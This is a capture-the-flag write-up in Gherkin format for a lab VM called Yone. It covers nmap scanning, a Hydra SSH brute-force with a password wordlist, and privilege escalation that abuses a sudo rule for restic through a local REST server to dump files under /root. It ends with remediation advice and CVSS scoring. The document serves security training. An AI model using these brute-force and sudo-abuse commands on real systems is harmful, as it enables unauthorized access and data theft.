## Version 1.4.1
## language: en

Feature:
  TOE:
    Yone
  Category:
    Brute Force
  Location:
    http://192.168.1.71/
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: Ascertain human interaction
  Goal:
    Get the root shell and then obtain flag under /root
  Recommendation:
    Restrict the number of attempts to connect to the system

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | Dirb              |  2.22      |
    | VMWare            |  16.0      |
    | Restic            |  0.9.6     |
    | SSH               |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-16 13:30 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.013s latency).
    Nmap scan report for 192.168.1.71
    Host is up (0.0018s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.0015s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.028s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 7.09 seconds
    """
    Then I determined that the IP of the machine is 192.168.1.71
    And I scanned the IP and found it has 2 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.71
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-16 13:33 -05
    Nmap scan report for 192.168.1.71
    Host is up (0.00074s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux)
    80/tcp open  http    nginx 1.10.3 (Ubuntu)
    MAC Address: 00:0C:29:18:F1:91 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 14.44 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a post about Yone
    """
    Yone is a character from a game called League Of Legends
    """
    And only that [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I see a server error
    """
    500 Internal Server Error
    """
    When I tried to find directories on the server with "dirb"
    """
    $ dirb http://192.168.1.71/
    """
    Then I didn't get anything useful either [evidences](nodirb.png)
    And I decided to change the attack vector, focus on port 22 (SSH)
    Then I plan to carry out a brute force attack

  Scenario: Exploitation
    Given my idea was to brute force against the SSH service
    Then I used Hydra with the wordlist "kaonashi14M.txt"
    """
    $ hydra -l yone -P kaonashi14M.txt 192.168.1.71 ssh
    """
    And I successfully got the SSH service password [evidences](passbf.png)
    Then I was able to connect to the service [evidences](connectssh.png)
    """
    $ ssh yone@192.168.1.71
    yone@192.168.1.71's password:
    Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-193-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

    New release '18.04.5 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.

    Last login: Fri Oct 16 11:27:49 2020 from 192.168.1.73
    yone@ubuntu:~$
    """
    And now that I have a shell the idea is to get root privileges
    Then for this I need a way to do an Local Privilege Escalation (LPE)
    When I used the command "sudo -l" to list user's privileges
    """
    Matching Defaults entries for yone on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin

    User yone may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/restic backup -r rest*
    """
    Then I noticed that it is possible to run "Restic" as root
    """
    Restic is a modern backup program that can back up your files:
    """
    And my idea is to use it to try to escalate privileges
    Then my idea is to create a repository
    """
    $ restic inti --repo restic
    enter password for new repository:
    enter password again:
    created restic repository c0dee84269 at restic
    """ [evidences](resticinit.png)
    And backup to the /root folder [evidences](resticbackup.png)
    """
    yone@ubuntu:~$ sudo restic backup -r restic /root
    enter password for repository:
    repository c0dee842 opened successfully, password is correct

    Files:           0 new,     0 changed,   243 unmodified
    Dirs:            0 new,     0 changed,     0 unmodified
    Added to the repo: 0 B

    processed 243 files, 529.902 MiB in 0:00
    snapshot 076f4b08 saved
    yone@ubuntu:~$
    """
    When accessing the snapshot: [evidences](snapshots.png)
    Then I realize that I can't read it: [evidences](resticsnap.png)
    And this is because:
    """
    Restic forces the snapshot ownership to the user who performs the backup
    """
    Then my idea is initialize a REST server [evidences](initserver.png)
    And make backup of /root with its privilege
    """
    $ rest-server --no-auth &
    Authentication disabled
    Private repositories disabled
    Starting server on :8000
    """
    Then I use Restic to make a backup of /root [evidences](backup.png)
    """
    $ restic backup -r rest:http://localhost:8000 /root
    """
    And once backed up [evidences](listroot.png)
    Then I can list the data from the /root directory using the snapshot
    """
    $ restic -r rest:http://localhost:8000/ ls f7d998f5
    /root
    /root/.bash_history
    /root/.cache
    /root/.cache/composer
    /root/.cache/composer/.htacces
    ...
    /root/root.txt
    """
    And I realize from a file that is the goal of the challenge: /root/root.txt
    """
    [evidences](roottxt.png)
    """
    Then using Restic I can read this file: [evidences](readroot.png)
    """
    $ restic -r rest:http://localhost:8000/ dump f7d9998f5 /root/root.txt
    """
    And it should be clarified that the objective is
    """
    Get the root shell and then obtain flag under /root
    """
    Then I was not able to get root shell but managed to get read privileges
    And read the "flag"

  Scenario: Remediation
    Restrict the number of authentication attempts for the SSH service
    And avoid brute force attacks
    Then this can be achieved using CAPTCHA or incremental delays

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-10-16}
